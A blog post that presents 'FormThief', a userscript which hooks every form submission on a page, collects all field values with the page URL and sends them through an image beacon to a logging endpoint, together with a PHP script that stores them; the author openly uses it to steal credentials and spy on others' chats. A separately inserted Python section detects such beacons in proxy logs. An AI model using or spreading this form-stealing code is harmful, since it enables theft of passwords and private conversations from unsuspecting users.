FormJacking

With all the buzz around Clickjacking I had to come up with an article which would contain that word, or at least a part of it. This article could be also named Form Thievery, but it wouldn’t sound that cool, would it?


The last userscript I wrote was a keylogger, which a lot of people seem to have liked, and which for its most common use was overkill.

Why overkill? Because most of those (if not all) who search for a keylogger will use it for stealing credentials. That was also my reason for writing it in the first place, although recently I use it for spying on web-based IM conversations >:). It may also be circumvented by the most common anti-keylogger tricks, like on-screen keyboards.

FormThief (that’s how I named the userscript), even if not perfect (authentication fails in places where forms have an action associated with the submit event, login.yahoo.com being one such example), will be quite enough for most of the cases you’ll want it for. The script has the following code:

(function(){
    var num = document.forms.length;
    for(var i=0;i<num;i++) {
        unsafeWindow.document.forms[i].addEventListener('submit', function(e) {
            var form = e.currentTarget;
            var num = form.length;
            var send = '?';
            for(var i=0;i<num;i++) {
                send += form[i].name + '=';
                send += form[i].value + '&';
            }
            send += 'ThiefedURL=' + unsafeWindow.location;
            new Image().src = 'http://127.0.0.1/fj.php'+encodeURI(send);
            return true;
        }, true);
    }
})()


As in the junkylogger, I have used unsafeWindow for accessing the content, and the Image object to send the logged/hijacked data. As for the logging PHP file, you could take the same approach as I did:


$str = "\n\n";
foreach($_GET as $key=>$val) {
    $str .= $key.'['.$val.']'."\n";
}

$fp = fopen('data.txt', 'a');
fwrite($fp, $str);
fclose($fp);
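From the defender's side, the beacon above has a recognisable shape in outbound proxy or egress logs: a GET request to a foreign host whose query string carries credential-looking field names in the clear, plus a parameter whose value is a full URL of another site (the ThiefedURL parameter here). The following is an added detection example, not code from the original post; the log format (client, method, URL, status) and the sample lines are constructed, and the attacker host 203.0.113.9 is a documentation address standing in for wherever fj.php would be hosted.

```python
"""Flag image-beacon style form exfiltration in outbound proxy logs.

A serialised form sent via `new Image().src` shows up as a GET request whose
query string contains field names such as password/passwd and, in the
userscript above, a ThiefedURL parameter pointing at the victim site.
"""
import re
from urllib.parse import urlsplit, parse_qsl

# Field names that should never travel in a GET query string in the clear.
CRED_FIELDS = {"password", "passwd", "pwd", "pass", "login", "username", "user"}
URL_VALUE = re.compile(r"^https?://", re.IGNORECASE)

# Constructed sample log: "<client> <method> <url> <status>" per line.
SAMPLE_LOG = """\
10.0.0.5 GET http://cdn.example.net/static/logo.png 200
10.0.0.5 GET http://203.0.113.9/fj.php?login=alice&passwd=hunter2&ThiefedURL=https://mail.example.com/login 200
10.0.0.7 GET http://search.example.org/?q=weather+today 200
10.0.0.5 GET http://203.0.113.9/fj.php?user=bob&pass=s3cret& 200
"""


def analyse_request(url):
    """Return the list of reasons a request looks like a form beacon ([] if clean)."""
    parts = urlsplit(url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    reasons = []

    # 1. Credential-like parameter names in a GET query string.
    names = {name.lower() for name, _ in params}
    cred = names & CRED_FIELDS
    if cred:
        reasons.append("credential fields in query: " + ",".join(sorted(cred)))

    # 2. A parameter whose value is a URL on a different host than the request:
    #    the serialised form is being sent somewhere other than the site it came from.
    for name, value in params:
        if URL_VALUE.match(value):
            origin_host = urlsplit(value).hostname
            if origin_host and origin_host != parts.hostname:
                reasons.append(f"param {name} carries a URL for another host ({origin_host})")
    return reasons


def scan_log(text):
    """Scan log text; return (client, destination host, reasons) for each suspicious GET."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4 or fields[1] != "GET":
            continue
        reasons = analyse_request(fields[2])
        if reasons:
            hits.append((fields[0], urlsplit(fields[2]).hostname, reasons))
    return hits


if __name__ == "__main__":
    for client, host, reasons in scan_log(SAMPLE_LOG):
        print(f"{client} -> {host}: " + "; ".join(reasons))
```

Run over the constructed sample, both requests to 203.0.113.9 are flagged and the two benign lines are not. In a real deployment the same two checks are cheap enough to run on every egress request; the second check (a URL-valued parameter naming one of your own domains) is the stronger signal, since legitimate image and tracking requests rarely carry another site's login URL as a query value.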

Nothing new in the concept; I just wanted to share it with you because I felt that it is a good addition to the Userscript keylogger, completing it where it could have failed and vice versa. With well-crafted @include and @exclude metadata, the two userscripts can work wonders, at least for me ;)

UPDATE: I modified the userscript and attached the function as kl suggested; now it works on any page (even login.yahoo.com). It also now appends the ThiefedURL parameter, so the logs show which form was hijacked.
